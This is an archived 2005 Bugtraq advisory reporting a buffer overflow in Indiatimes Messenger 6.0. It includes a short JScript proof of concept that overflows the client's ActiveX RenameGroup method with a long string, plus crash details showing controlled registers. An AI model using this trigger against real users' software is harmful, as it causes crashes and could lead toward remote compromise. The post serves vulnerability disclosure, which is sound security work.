lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050831124412.41165.qmail@web8510.mail.in.yahoo.com>
Date: Wed, 31 Aug 2005 13:44:12 +0100 (BST)
From: ViPeR <viper31337@...oo.co.in>
To: bugtraq@...urityfocus.com
Subject: Indiatimes Messenger 6.0 Buffer Overflow (Remote)


Indiatimes Messenger 6.0 Buffer Overflow (Remote)

Vulnerable Program : Indiatimes Messenger v6.0
(Latest)

Vendor URL : http://messenger.indiatimes.com/
(Attempt to contact thru
http://messenger.indiatimes.com/feedback.htm failed!)

Exploit Type : Remote DoS (Remote Compromise may also
be possible)

Discovered by : Gregory R. Panakkal

Proof Of Concept:

[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";

for(i=0; i<1000; i++)
{
  buf += "A";
}

while(obj1.GetServerStatus() != "Logged In"); //wait
till login

obj1.RenameGroup("Friends", buf, 5);
[/script]


The program (MMClient.exe) crashes @ 
004B681B   8979 04          mov dword ptr
ds:[ecx+4],edi
with registers ecx, and edi = 0x41414141
[controllable]

So, remote compromise maybe possible (not confirmed).

rgds,
Gregory R. Panakkal
http://www.infogreg.com



	

	
		
__________________________________________________________ 
Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ